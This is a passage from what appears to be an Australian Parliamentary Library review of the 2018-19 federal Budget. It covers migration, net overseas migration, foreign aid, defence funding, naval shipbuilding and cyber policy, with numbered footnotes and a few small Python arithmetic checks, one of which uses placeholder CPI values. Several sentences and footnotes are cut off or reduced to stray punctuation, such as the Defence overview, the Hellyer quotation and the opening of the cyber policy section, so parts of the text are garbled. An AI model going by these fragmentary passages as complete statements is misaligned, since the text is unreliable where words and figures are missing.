The 2018-19 Budget includes the establishment of a new pathway to permanent residency for holders of retirement category visas, a visa for self-funded retirees who have no dependents.339 This will be achieved by regulatory amendments. To maintain the overall planning level, people who hold a retirement visa will be allocated a proportion of visas that would otherwise have been granted to people who have applied for parent visas. This will likely increase waiting periods for parent visas, which are currently between six and 30 years.340 In addition, as people who hold retirement visas already live in Australia, and as most people who gain a parent visa currently live outside of Australia, this change will reduce the number of new migrants to Australia.341
Migration, population growth and the Budget
A number of commentators have noted the importance of population growth, and immigration flows, to economic growth and fiscal projections in the Budget.342 A recent joint Treasury and Department of Home Affairs report concluded that the net fiscal impact of the 2014-15 migrant cohort (the Migration Program, the Humanitarian Program and the temporary skilled visa program) is $9.7 billion over 50 years.343 The fiscal effect of new migrants was noted by the Treasurer recently in the context of the debate about the appropriate size of the Migration Program.344
It can be difficult to project net overseas migration (NOM) trends. NOM is the net gain or loss of population through people arriving to or departing Australia. For example, in the 2017-18 Budget, the NOM projection for 2017 was 209,018 whereas the actual figure was 242,600, an increase of 16 per cent on the projection.345
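The 16 per cent variance in the 2017 NOM projection can be checked directly. A quick calculation using only the figures quoted above:

```python
# NOM for 2017: 2017-18 Budget projection vs the actual outcome.
projected = 209_018
actual = 242_600
variance = (actual - projected) / projected * 100
print(round(variance))  # 16 (per cent above projection)
```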
Table A.2 in Budget Paper No. 3 shows the assumptions for NOM in the 2018-19 Budget. The assumptions show NOM gradually falling from 234,600 in 2018 to 221,400 in 2021.346 Variations from these assumptions would necessarily flow through to a range of projections in the Budget, including GDP growth and the underlying fiscal conditions.
335. P Dutton (Minister for Immigration and Border Protection), Restoring integrity to refugee intake, media release, 12 May 2015.
336. Phillips and Simon-Davies, op. cit.
337. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.10: Home Affairs Portfolio, p. 51.
338. Ibid.
339. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 14.
340. Parliamentary Library calculations based on Department of Immigration and Border Protection (DIBP), 2016-17 Migration Programme report, pp. 14-15.
341. Ibid., p. 3.
342. See M Janda, ‘How the Government’s surplus plan locks in high immigration’, ABC News, 9 May 2018; and J Sloan, ‘Optimistic forecasts crowd out an immigration fix’, The Australian, 9 May 2018, p. 13.
343. The Treasury and Department of Home Affairs, Shaping a nation: population growth and immigration over time, Canberra, 2018, p. 35.
344. S Morrison (Treasurer), Interview Neil Mitchell, 3AW, Immigration, corporate tax cuts, petrol prices, transcript, 21 February 2018.
345. Australian Government, Budget measures: budget paper no. 3: 2017-18, p. 88 and Australian Government, Budget measures: budget paper no. 3: 2018-19, p. 84.
346. Ibid., p. 84.
The NOM budget assumptions over the forward estimates represent a decline from current NOM trends. The most recently available Australian Bureau of Statistics data show in the 12 months to 30 September 2017, the preliminary estimate for NOM was 250,100, a 15.4 per cent increase compared to the previous 12 month period.347 This level of NOM represents 63 per cent of Australia’s population growth.
Other migration and associated measures
As part of the Stronger Rural Health package, the Australian Government is reducing the number of visas granted to overseas trained doctors to around 2,100 per year. This reduction in visas will redirect $415.5 million over the forward estimates into other health policy priorities. This is the largest saving in the Budget.348 Australian trained doctors are being encouraged into areas of shortage via a variety of new policies to make up for the reduction in overseas trained doctors.349
A new fund for training Australians, the Skilling Australians Fund (SAF), was introduced in the 2017-18 Budget.350 The SAF imposes a levy on employers who sponsor temporary and permanent skilled migrants. A new measure in the 2018-19 Budget provides for a series of employer refund and exemption provisions. The Australian Government expects to forego $105.1 million over the forward estimates, resulting in an equivalent reduction in payments to state and territory governments via the SAF. The Law Council recommended the Australian Government provide further clarity and consideration for levy refunds in their December 2017 submission on the legislation.351 This change will require legislation.
Restrictions on recent humanitarian migrants accessing full jobactive support are being extended from 13 weeks to 26 weeks, generating savings of $68.1 million over the forward estimates. The Australian Government says this is to ‘improve the sequencing of services’ and to promote language services for new humanitarian migrants to Australia. The Minister for Citizenship and Multicultural Affairs, Alan Tudge, recently highlighted the importance of getting new arrivals into work: ‘Our goal should be that people arrive here and immediately have a place to work …the best place to integrate is in the workplace’. 352 One concern with this measure is that it could impede some new arrivals who are job ready from entering the workforce.
Operation Sovereign Borders and asylum policy
Additional funding for detention, offshore processing and border protection has been a strong focus of recent Budgets. The 2018-19 Budget provides an additional $62.2 million over two years for Operation Sovereign Borders. There are four sub-components of this measure, including offshore resettlement arrangements and regional cooperation initiatives; however, the funding breakdown is aggregated into one figure.
The Department of Home Affairs Portfolio Budget Statement notes expenses for Irregular Maritime Arrival Offshore Management is expected to halve from $759.9 million in 2018-19 to $378.4 million in 2019-20.353 Similarly, expenses associated with regional cooperation are
347. Australian Bureau of Statistics (ABS), Australian Demographic Statistics, Sep 2017, cat. no. 3101.0, ABS, Canberra, 2018.
348. Australian Government, Budget 2018-19: budget overview, Appendix D, p. 36.
349. For more detail on these policies, see M Biggs, ‘Rural Health Workforce’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018.
350. For more detail on the Skilling Australians Fund, see H Ferguson, ‘Tertiary education’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018.
351. Law Council of Australia, Submission to Senate Standing Committee on Education and Employment, Inquiry into the Migration Amendment (Skilling Australians Fund) Bill 2017, and the Migration (Skilling Australians Fund) Charges Bill 2017 [provisions], 22 December 2017, p. 6.
352. A Tudge (Minister for Citizenship and Multicultural Affairs), The integration challenge: maintaining successful Australian multiculturalism, speech to the Menzies Research Centre, Canberra, 7 March 2018.
353. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.10: Home Affairs Portfolio, p. 29.
projected to fall from $91.1 million in 2018-19 to $47.3 million in 2019-20.354 This is likely due to an expected smaller number of people being in offshore management and a draw down on projects facilitating regional cooperation, however an explanation is not provided in departmental budget documents. As the estimated actual expenditure on Irregular Maritime Arrival Offshore Management was double the forecast for 2017-18, these figures may be subject to change.355
354. Ibid.
355. Ibid., and see Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.11: Home Affairs Portfolio, p. 25.
Foreign affairs and Official Development Assistance
Dr Geoff Wade and Dr Cameron Hill
A domestically-focused 2018-19 Budget sees little change in the profile and tasks of the Department of Foreign Affairs and Trade (DFAT). The departmental appropriation of $1.96 billion represents a slight decrease (2 per cent) relative to the 2017-18 estimated actual, while overall resourcing is slated to climb by almost 2 per cent to $6.1 billion. Average staffing levels will also rise from 5,700 to 5,741.356
Guided by the 2017 Foreign Policy White Paper, DFAT’s strategic attention remains focused on the Indo-Pacific.357 Australian diplomatic representation is proposed to expand through a new Consulate-General in Kolkata, India, and a new High Commission in Tuvalu. The Government describes these new posts as part of the ‘largest expansion of our diplomatic network in 40 years’.358 Remarkably, though, DFAT’s Strategic Direction Statement makes no reference to Australia’s links with the United States, despite the frequency of such references in the White Paper and earlier budget papers.
The Pacific has assumed a larger profile than in previous budgets, with increased ‘support for a more resilient Pacific and Timor-Leste’ being listed as ‘one of the five objectives of fundamental importance to Australia’s security and prosperity’—an agenda adopted in the White Paper.359
An Australia Pacific Security College is being funded ‘to deliver security and law enforcement training at the leadership level’.360 This initiative could be seen as a mechanism to counter China’s growing security and law enforcement engagement with Pacific nations.361 Funding for the College is included in the $37.9 million to be provided over four years from 2017-18 for initiatives supporting the White Paper.362 Increased defence engagement with the Pacific is being funded through an expanded Defence Cooperation Program.363
Australia’s engagement with Southeast Asia will be further expanded through a ‘package of new maritime cooperation initiatives’, agreed at the 2018 ASEAN-Australia Leaders’ Summit in March.364 Again, this might be seen as a response to China, which has issued its own ‘Vision for Maritime Cooperation under the Belt and Road Initiative’.365 Specifics about the Australian maritime initiatives with Southeast Asia have not been publicly detailed.
On the trade front, the stress on the original Trans-Pacific Partnership agreement has shifted to enthusiasm for the now-signed Comprehensive and Progressive Agreement for the Trans-Pacific Partnership (TPP-11). Ongoing free trade agreement talks with Indonesia, Hong Kong and the Pacific, as well as impending negotiations with the European Union, are also underlined.
356. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.8: Foreign Affairs and Trade Portfolio, 2018, pp. 16-17. 357. Department of Foreign Affairs and Trade (DFAT), 2017 Foreign policy white paper, Australian Government, November 2017. The White Paper defines the Indo-Pacific as ‘the region ranging from the eastern Indian Ocean to the Pacific Ocean connected
by Southeast Asia, including India, North Asia and the United States’, p. 1. 358. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.8, op. cit., p. 15. 359. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.8, op. cit., p. 13; DFAT, 2017 Foreign policy white paper, op. cit., p. 3. 360. DFAT, 2017 Foreign policy white paper, op. cit., p. 103. 361. C Hill, ‘China’s policing assistance in the Pacific: a new era?’, FlagPost, Parliamentary Library blog, 6 April 2018. 362. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, p. 153. 363. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, pp. 117-18. 364. Department of the Prime Minister and Cabinet, ASEAN-Australia Special Summit initiatives, ASEAN-Australia Special Summit
2018 website. 365. People’s Republic of China, Full text of the Vision for Maritime Cooperation under the Belt and Road Initiative, State Council website, June 2017.
More than $50.3 million is being provided over four years to fund Australia’s participation in a Dutch national prosecution of those responsible for bringing down Malaysia Airlines flight MH17.366
Over the next two years Australia’s total Official Development Assistance (ODA) will increase slightly in nominal terms, rising from an adjusted estimate of $4.077 billion in 2017-18 to around $4.161 billion in 2018-19 and $4.170 billion in 2019-2020.367 Over the forward estimates, however, aid will be subject to real cuts totalling $141 million as the Government extends a previous funding cap of $4 billion to 2021-22.368 Australia’s ODA as a proportion of Gross National Income is expected to fall to 0.19 per cent by 2021-22, its lowest recorded level.369 While the new cuts are significant, they amount to less than the $400 million reduction reportedly considered prior to the Budget.370
Much of the increase in this year’s funding will be used to finance the ODA-eligible portion of Australia’s contribution to the China-led Asian Infrastructure Investment Bank ($161 million in 2018-19).371 Cuts in aid to Indonesia ($30 million) and Cambodia ($6 million) will help meet the costs of building undersea communications cables for Papua New Guinea and the Solomon Islands.372 Australia committed to co-finance this initiative following reports of national security concerns surrounding the involvement of the Chinese telecommunications company, Huawei, in the Solomon Islands project.373 The Government has not published the costs of this initiative in the
budget papers.374 One estimate puts the cost at around $200 million, and completion is reportedly expected within two years.375
In line with the broader focus on the Pacific, Australia’s total aid to this region is expected to increase to $1.283 billion in 2018-19. The Government has described this as ‘our largest ever contribution’.376 In real terms, aid to the Pacific will be slightly higher than in 2014-15, the Coalition’s first budget (see Table 1). Australia’s assistance will include the new Australia Pacific Security College, and increased support for new Pacific labour mobility initiatives.377
366. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.8, op. cit., p. 18. For background, see:, 20 September 2017.
367. DFAT, Australian aid budget summary, 2018-19, Australian Government, 8 May 2018, pp. 11, 126. 368. Australian Government, Portfolio budget statements 2018-19: budget related paper no.1.9, op. cit., p. 18. 369. Development Policy Centre, Australian aid tracker: trends, Australian National University website. 370. M Watt, ‘The Turnbull government is mulling more cuts to overseas aid’, Sydney Morning Herald (online), 28 March 2018. 371. DFAT, Aid budget summary, op. cit., p. 9. 372. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.8, op. cit., p. 18; DFAT, Aid budget
summary, op. cit., p. 7. 373. DFAT, Aid budget summary, op. cit., p. 8. 374. ABC News, ‘Undersea cable deal with PNG inked amid concerns over Chinese influence in the Pacific’, ABC News (online), 14 November 2017. 375. C Graue, ‘Budget 2018: Australia to pay for new high-speed internet cable for PNG and Solomons using aid funds’, ABC News
(online), 6 May 2018; C Graue, ‘“Not a good look”: calls for transparency after Liberal Party donor wins Pacific cable contract’, ABC News (online), 8 May 2018. 376. J Bishop (Minister for Foreign Affairs) and S Ciobo (Minister for Trade, Tourism and Investment), 2018 Foreign Affairs and Trade, Tourism and Investment budget, media release, 8 May 2018. 377. DFAT, Aid budget summary, op. cit., p. 35.
Table 1: total Australian ODA, 2014-15 and 2018-19 (A$,’000)
Region 2014-15 (a) 2018-19 (est.) (b) Real change (%) (c)
PNG and the Pacific 1 160 269 1 283 600 +2.9
Global 1 567 397 1 301 200 -22.8
East/Southeast Asia 1 358 646 1 027 200 -29.7
Middle East and Africa 387 589 258 500 -38.0
South and West Asia 475 338 284 800 -44.3
Latin America and the Caribbean 23 873 5 900 -77.0
Sources: (a) DFAT, Australia’s International Development Assistance: statistical summary 2014-15, Australian Government, 2016, pp. 5-6; (b) DFAT, Australian aid budget summary, 2018-19, Australian Government, May 2018, pp. 10-11; (c) Parliamentary Library calculation: real conversion based on CPI for 2014-15 to 2016-17 and Budget 2018-19 CPI forecasts for 2017-18 and 2018-19.
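The real-change column in Table 1 can be reproduced with a simple CPI deflator, as note (c) describes. The sketch below is illustrative only: the `cpi_rates` values are placeholder assumptions, not the actual ABS outcomes and Budget forecasts the Library used.

```python
def real_change(nominal_start, nominal_end, cpi_rates):
    """Percentage change once the end-year figure is deflated to start-year dollars.

    cpi_rates: year-on-year CPI growth rates (e.g. 0.019 for 1.9 per cent)
    covering each year between the two observations.
    """
    deflator = 1.0
    for rate in cpi_rates:
        deflator *= 1.0 + rate
    real_end = nominal_end / deflator  # end-year figure in start-year dollars
    return (real_end / nominal_start - 1.0) * 100.0

# PNG and the Pacific: $1,160,269k (2014-15) to $1,283,600k (2018-19 est.).
# The CPI path below is a placeholder; the Library's calculation with the
# actual CPI series yields the +2.9 per cent shown in the table.
print(round(real_change(1_160_269, 1_283_600, [0.015, 0.013, 0.019, 0.0225]), 1))
```

With a zero-inflation path the function reduces to the nominal percentage change, which is a quick sanity check.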
Humanitarian aid will rise slightly, from $400 million to $410 million, as the Government moves to implement a commitment to increase overall spending in this area to $500 million per annum.378
Non-government organisations have criticised the Government’s application of new aid cuts, noting that the decision ‘puts us in a similar category to Greece and Hungary’.379 The Labor Opposition has described the cuts as an ‘international embarrassment’, contrasting the Government’s approach with the decision by New Zealand to increase ODA by 30 per cent over the next four years.380
There are broader questions as to whether Australia can remain a ‘partner of choice’ for its developing country neighbours while the aid budget continues on a downward trajectory in real terms. The 2017 White Paper describes a more competitive Indo-Pacific and some have argued that aid—alongside more traditional forms of power—will play a prominent role in intensifying contests for regional influence.381 These issues will attract further scrutiny in the months ahead as the Government undertakes its first ever review of Australia’s ‘soft power’ capabilities, and as a parliamentary inquiry into the ‘strategic effectiveness and outcomes of Australia’s aid to the Indo-Pacific’ commences.382
378. Ibid., p. v. 379. Australian Council for International Development (ACFID), ACFID analysis of the 2018-19 Budget, 8 May 2018, p. 3. 380. P Wong (Shadow Minister for Foreign Affairs) and C Moore (Shadow Minister for International Development and the Pacific), Aid cut again as Turnbull ignores wake up call, media release, 9 May 2018. 381. A Grigg and L Murray, ‘Defence establishment frowns on proposed Australian aid cuts’, Australian Financial Review (online),
6 April 2018. 382. DFAT, 2017 Foreign policy white paper, op. cit., p. 107; Joint Standing Committee on Foreign Affairs, Defence and Trade, Inquiry into the strategic effectiveness and outcomes of Australia’s aid program in the Indo-Pacific and its role in supporting
our regional interests, Parliament of Australia website.
Defence budget overview David Watt.383.384 The PBS figures represent total Defence funding minus own-source revenue.385
$ billion 2017-18 2018-19 2019-20 2020-21 2021-22
2018-19 PBS 35.2 35.6 37.3 40.6 44.2
2017-18 PBS 34.7 36.0 38.7 42.0 -
2016 DWP 34.2 36.8 39.0 42.4 45.8.386

Other fluctuations in the budget forecast include $645 million additional funding for Defence operations and $244 million in foreign exchange supplementation.387
The Portfolio Budget Statement (PBS) confidently asserts that ‘the Defence budget, inclusive of the ASD, will grow to two per cent of Australia’s Gross Domestic Product by 2020-21’.388
383. M Payne (Minister for Defence) and C Pyne (Minister for Defence Industry), A safer Australia-Budget 2018-19 Defence overview, media release, 8 May 2018. 384.. 385.. 386. Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, op. cit., p. 20. 387. Ibid., pp. 19-20. 388. Ibid., p. 5.
The Government’s own figures for expenditure indicate that 6.4 per cent of total government expenditure is on Defence.389
On the issue of the 2 per cent of GDP target, the Australian Strategic Policy Institute’s Marcus Hellyer has.
390
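The arithmetic behind the 2 per cent target can be checked directly against the funding table above. The GDP figure below is implied from the PBS numbers rather than quoted from the budget papers, so treat it as a back-of-envelope illustration.

```python
# Defence funding (A$ billion) from the 2018-19 PBS row of the table above.
pbs_funding = {"2018-19": 35.6, "2019-20": 37.3, "2020-21": 40.6, "2021-22": 44.2}

# If $40.6b is to equal 2 per cent of GDP in 2020-21, the implied nominal GDP is:
implied_gdp = pbs_funding["2020-21"] / 0.02  # about $2,030 billion

def share_of_gdp(defence_spend, gdp):
    """Defence spending as a percentage of GDP."""
    return 100.0 * defence_spend / gdp

print(round(implied_gdp))  # 2030
```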
Budget measures
In addition to the budget measures mentioned above, the 2018-19 PBS contains total funding for operations of $750 million.391).392.393 During November 2017 the Prime Minister stated that there were 80 ADF personnel in the Philippines.394
Australian Signals Directorate
389. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, pp. 6-9. 390. M Hellyer, ‘2% of GDP: just a hop, skip and a jump away’, The Strategist, blog, Australian Strategic Policy Institute, 9 May 2018. 391. Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, op. cit., p. 21. 392. Ibid. 393. M Payne (Minister for Defence), Philippines and Australia agree to enhanced counter-terrorism cooperation, media release,
24 October 2017. 394. M Turnbull (Prime Minister), Press conference with Senator the Hon Marise Payne, Minister for Defence and the Hon Christopher Pyne MP, Minister for Defence Industry Canberra, ACT , transcript, 24 November 2017.
function has been carried out within its own agency.395 As a result of the change, ASD gets a section of its own in the PBS, which indicates that funding for 2018-19 is $827.3 million.396’.397 It is therefore possible that this reduction in staffing is related to ASD. The 2016 Defence White Paper claimed that ‘enhancements to intelligence, space and cyber security capabilities will involve 800 new APS positions’.398 These were to be offset by reductions elsewhere, but given ASD’s need to employ specialised staff, presumably some of these positions will go to ASD.
Defence workforce
The Defence APS workforce will fall from 17,800 in the current year to 16,373 in 2018-19 as a result of machinery of government changes.399 This is a change from last year’s Defence PBS which forecast Defence APS staffing to be 18,200 in 2018-19.400.401
The total Defence workforce for 2018-19 is expected to be 76,167.402
395. Background can be found in: C Barker, Intelligence Services Amendment (Establishment of the Australian Signals Directorate) Bill 2018, Bills digest, 94, 2017-18, Parliamentary Library, Canberra, 2018. 396. Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, op. cit., p. 164. 397. Australian Government, Agency resourcing: budget paper no. 4: 2018-19, p. 185. 398. 2016 Defence white paper, op. cit., p. 150. 399. Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, op. cit., p. 24. 400. Portfolio budget statements 2017-18: budget related paper 1.4A: Defence Portfolio, op. cit., p. 20. 401. Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, op. cit., p. 146. 402. Ibid., p. 27.
Defence capability Nicole Brangwin
Given the large number of defence capability announcements made since the release of the 2016 Defence White Paper in February 2016, one might be forgiven for losing track. This year’s Budget contains no new announcements beyond those made before Budget night, so this brief aims to take stock of progress in the ever-broadening defence capability sphere.
The pace of major defence capability announcements made by the Australian Government since the release of the 2016 Defence White Paper suggests many of the proposed capabilities outlined in the Integrated Investment Program, which accompanied the White Paper, may well be delivered.403 Conversely, the speed at which decisions are being made on expensive, complex, long-term projects continues to raise concerns about the level of scrutiny applied by Cabinet and whether some of these projects might eventually appear on the Projects of Concern list.404
The overall cost attached to the Integrated Investment Program was originally $195 billion over ten years to 2025-26.405 This figure was revised upwards in the 2017-18 Budget to $200 billion out to 2027-28.406 The explanation for the $5 billion revision was that it reflects ‘the best available
information in respect to project planning, delivery reality, cost estimates, phasing, and other important judgments and assumptions critical to delivery of the capital investment portfolio’.407
Defence has for some time been criticised for declining transparency in its reporting of capability issues. The application of the two-pass approval process to the major capital investment program is absent from this year’s Budget, and the estimated budgets for approved and unapproved projects are indistinguishable, as both streams are lumped together under a single line item: the Major Capital Investment Program, which totals $41,106.6 million over the forward estimates.408 Greater visibility of the unapproved Major Capital Investment Program and its associated costs would not only better inform an industry that is expected to ramp up to meet Defence’s strategic requirements, it would also allow the Parliament to scrutinise these decisions on behalf of the public. The Australian Strategic Policy Institute has monitored the level of transparency over the years and Marcus Hellyer recently.
409
Since the release of the 2016 Defence White Paper, the Government has published a series of policies, plans and strategies with specific funding figures attached. These include the:
⢠National Shipbuilding Plan worth $90 billion in new frigates ($35 billion) offshore patrol boats ($3-4 billion) and submarines ($50 billion), over $1 billion in shipyard infrastructure
403. Australian Government, 2016 Defence white paper, Department of Defence, 25 February 2016. 404. A Davies, ‘Defence acquisition: kicking the can down the road’, Australian Strategic Policy Institute, blog, 14 February 2018; D Watt, ‘Defence budget overview’, Budget review 2017-18, Research paper series, 2017-18, Parliamentary Library, Canberra, 2017; D Watt, ‘Defence capability’, Briefing book: key issues for the 45th Parliament, Parliamentary Library,
Canberra, 2015. 405. Australian Government, 2016 Integrated Investment Program, Department of Defence, February 2016, p. 9. 406. Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.4A: Defence Portfolio, 2017, p. 117. 407. Ibid., p. 117. 408. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.4A: Defence Portfolio, 2018, p. 22. 409. M Hellyer, ‘2% of GDP: just a hop skip and a jump away’, Australian Strategic Policy Institute, blog, 9 May 2018.
modernisation and around $25 million towards skilling and growing the workforce.410 The re-profiling of $500 million in defence expenditure to financial year 2018-19 is said to help align defence funding with projects such as the naval shipbuilding program411
⢠Defence Export Strategy establishes the Australian Defence Export Office and an Australian Defence Export Advocate position (former Defence Minister David Johnston was recently appointed to this position), and provides $3.8 billion towards a Defence Export Facility and $20 million per year to implement the strategy.412 This year’s Budget confirmed that $80 million over four years would be allocated from existing resources, including $6.3 million per year to support the work of the Defence Export Office. In addition, $4.1 million per year will be allocated to expanding the Centre for Defence Industry Capability grants program and $3.2 million to the Global Supply Chain program and413
⢠Defence Industrial Capability Plan establishes Australia’s sovereign industrial capability priorities and includes various initiatives such as the Naval Shipbuilding College (worth $62 million over three years) and $17 million towards funding the sovereign industrial capability priorities grants program.414 This year’s Budget confirms the $17 million figure over the forward estimates, totalling $68 million from existing resources.415
Defence’s Net Capital Investment primarily relates to military equipment and is expected to reach $3.8 billion in 2018-19 and continue to grow to $8 billion by 2021-22.416
Defence Cooperation Program
Under the Defence Cooperation Program (DCP), Papua New Guinea (PNG) continues to receive the largest amount of funding, with $42.7 million allocated in 2018-19, an increase of around $3 million on the previous Budget. The ADF is assisting the PNG military with security aspects of the upcoming APEC meeting, to be held in PNG in November 2018.417
The DCP as a whole received a boost in this Budget, from $128 million in 2017-18 to $164 million in 2018-19.418 This is mainly due to the Pacific Maritime Security Program for which Western Australian company Austal has been contracted to build 21 Guardian Class patrol boats. PNG is expected to be the first recipient of the new boats in 2018.419
Major acquisitions
As mentioned above, the list of projects slated for first or second pass approval (and sometimes combined) under the Integrated Investment Program has been excluded from this Budget. The Defence Annual Report 2016-17 noted that during that financial year:
…74 capability-related submissions were approved by Government against an initial plan of 62 (as given in the 2016 Defence White Paper). Fifteen of those submissions received first pass approvals, 31 received second pass approvals, 15 received other types of Integrated Investment Program project
410. Australian Government, Naval shipbuilding plan, Department of Defence, 16 May 2017, p. 80. 411. Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018, p. 83. 412. Australian Government, Defence export strategy, Department of Defence, 29 January 2018, pp. 17-18. 413. Budget measures: budget paper no. 2: 2018-19, op. cit., p. 82. 414. Australian Government, Defence industrial capability plan, Department of Defence, 23 April 2018, pp. 8 and 64. 415. Budget measures: budget paper no. 2: 2018-19, op. cit., pp. 82-83. 416. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, 2018, p. 6-48. 417. Asia-Pacific Economic Cooperation (APEC), ‘APEC 2018 Papua New Guinea’, APEC website. The Defence Portfolio Budget
Statements did not refer to APEC specifically, rather it mentioned assisting PNG with its ‘Major Event Security capabilities’. Portfolio budget statements 2018-19: Defence Portfolio, op. cit., p. 118. 418. Portfolio budget statements 2018-19: Defence Portfolio, op. cit., p. 118. 419. Ibid.
approvals, and 13 approvals were granted for submissions that provided advice to Government on current and future capability. 420
In 2017-18, the Portfolio Budget Statements for Defence showed there had been 20 first pass approvals and 37 second pass approvals (plus two ‘other’ approvals) during that financial year.421 The Portfolio Additional Estimates Statements for 2017-18 provided a minor update showing three second pass approvals and two ‘other’ approvals (no first pass approvals were noted).422
The Projects of Concern list was last updated in February 2018 when the Government announced the Air Warfare Destroyer and the Collins Class submarine projects had been removed from the list.423 There are possibly four projects remaining, two of which are related to the OneSKY civil military air traffic management system (CMATS).424
Defence is contributing to the Airservices-led OneSKY project to develop a national CMATS. Airservices is expected to cover 57 per cent and Defence 43 per cent of the acquisition costs of $1.2 billion.425 In the Budget, the Defence approved project expenditure component for phase 3 is listed as $974 million, substantially more than 43 per cent of the total cost.426 This possibly accounts for the Government’s approval of an additional $243 million earlier this year.427 As the agreement between all parties to the project was only signed in February 2018, following protracted negotiations, Defence has so far spent $155 million and another $116 million is earmarked for 2018-19.428 This project is still on the Projects of Concern list but is expected to be reviewed in light of recent progress.429
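The ‘substantially more’ claim is easy to verify: a 43 per cent share of the $1.2 billion acquisition cost would be about $516 million, roughly $458 million less than the $974 million listed for Defence. A minimal check, using only the figures quoted above:

```python
total_acquisition = 1_200  # CMATS acquisition cost, $ million (Senate Hansard)
defence_share = 0.43       # Defence's agreed share of acquisition costs

expected_defence = defence_share * total_acquisition  # about $516 million
listed_phase3 = 974        # Defence approved expenditure for phase 3, $ million
excess = listed_phase3 - expected_defence             # about $458 million

print(round(expected_defence), round(excess))  # 516 458
```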
Naval shipbuilding
In February 2016, the Defence White Paper confirmed that Australia would acquire 12 conventional submarines to replace the Collins Class submarines (which cost over $500 million per year to sustain).430 In April 2016, DCNS (now Naval Group) from France was selected as the preferred international design partner for Australia’s Future Submarine program.431 The successful design is the Shortfin Barracuda Block 1A.432 Overall investment in the ‘rolling acquisition’ program is worth $50 billion.433 In this year’s Budget, the Future Submarine Program is at phase 1B with an approved budget of $2.2 billion.434 The most recent announcement about Defence’s most ambitious acquisition was made on 3 May 2018 and stated that the critical design work will be moved from France to South Australia from 2022. Initial design work is ongoing.435
420. Australian Government, Annual report 16-17, Department of Defence, p. 123. 421. Portfolio budget statements 2017-18: Defence Portfolio, op. cit., pp. 117-119. 422. Australian Government, Portfolio Additional Estimates Statements 2017-18: Defence Portfolio, 2018, p. 85. 423. M Payne (Minister for Defence) and C Pyne (Minister for Defence Industry), Air Warfare Destroyer project removed from
projects of concern list, media release, 1 February 2018. 424. Department of Defence (DoD), ‘Projects of Concern update’, DoD website. 425. Senate Rural and Regional Affairs and Transport Legislation Committee, Official committee Hansard, 26 February 2018,
p. 109.
426. Portfolio budget statements 2017-18: Defence Portfolio, op. cit., p. 125. 427. Senate Foreign Affairs Defence and Trade Legislation Committee, Official committee Hansard, 28 February 2018, p. 75. 428. Portfolio budget statements 2018-19, Defence Portfolio, op. cit., p. 125. 429. Joint Standing Committee on Foreign Affairs, Defence and Trade, Official committee Hansard, 4 May 2018, p. 38.
430. Australian Government, 2016 Defence white paper, op. cit., p. 90. 431. M Turnbull (Prime Minister) and M Payne (Minister for Defence), ‘Future submarine program’, press release, 26 April 2016. 432. Naval Group, ‘The Shortfin Barracuda Block 1A’, Naval Group website. 433. M Turnbull (Prime Minister) and M Payne (Minister for Defence), ‘Future submarine program’, op. cit. 434. Portfolio budget statements 2018-19, Defence Portfolio, op. cit., p. 129. 435. M Turnbull (Prime Minister), M Payne (Minister for Defence) and C Pyne (Minister for Defence Industry), ‘Submarine design
to move to Australia’, media release, 3 May 2018.
The Budget also notes that a decision on the Future Frigate program is expected before the middle of 2018 and the Offshore Patrol Vessels are to commence construction in 2018 as per the Naval Shipbuilding Plan.436
436. Portfolio budget statements 2018-19, Defence Portfolio, op. cit., p. 130.
Cyber policy
Hel’.437’.438 Minister Dutton foreshadowed the prevention of cybercrime and cyberattack and the promotion of ‘cyber resilience’ as core objectives of the new Home Affairs portfolio, which now has carriage of the Government’s 2016 Cyber Security Strategy (the Strategy).439 The Home Affairs 2018-19 Portfolio Budget Statements stipulate the performance criterion for the relevant programs involved in providing ‘timely, relevant and forward leaning cyber security policy advice, to protect and advance Australia’s interests online’.440.441 Despite the lack of detail on whether the Government is on track to achieve those goals, this year’s Budget does contain a number of measures that relate to the implementation of that action plan—and not only in the Home Affairs portfolio.442 Budget measures that explicitly mention cybersecurity outcomes span the Foreign Affairs and Trade, Health and Jobs and Innovation portfolios.443.444 Additionally, there are measures targeting criminal behaviour online, as well as abuse that falls short of the criminal threshold.445
437. J Bishop (Minister for Foreign Affairs), Keynote speech at the 2018 Safeguarding Australia National Security Annual Summit, Canberra, media release, 9 May 2018. 438.. 439. Australian Government, Portfolio additional estimates statements 2017-18: Home Affair’s Portfolio, p. 25; P Dutton (Minister for Home Affairs), Address to the National Press Club, Canberra, op. cit. 440. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.10: Home Affairs portfolio, p. 40. 441. N Brangwin, ‘Cybersecurity’, Budget review 2016-17, Research paper series, 2015-16, Parliamentary Library, Canberra, 2016. 442.. 443.). 444.. 445.,
The distribution across portfolios, however, reflects the ‘[increasing reliance] on the internet in many aspects of our society and economy’ that the Minister for Foreign Affairs mentioned in her address on 9 May 2018.446.447
The critical role of the Australian Signals Directorate
Legislation to establish the Australian Signals Directorate (ASD) as a statutory agency while remaining within the Defence portfolio will come into effect on 1 July 2018. The Defence Portfolio Budget Statements state that there are no budget measures relating to ASD.448 But the ASD will adopt formal responsibility for the Australian Cyber Security Centre (ACSC) from the beginning of the 2018-19 financial year,449 together with:
⢠the Computer Emergency Response Team along with its cyber policy and security functions, which is being transferred from the Attorney-General’s Department450
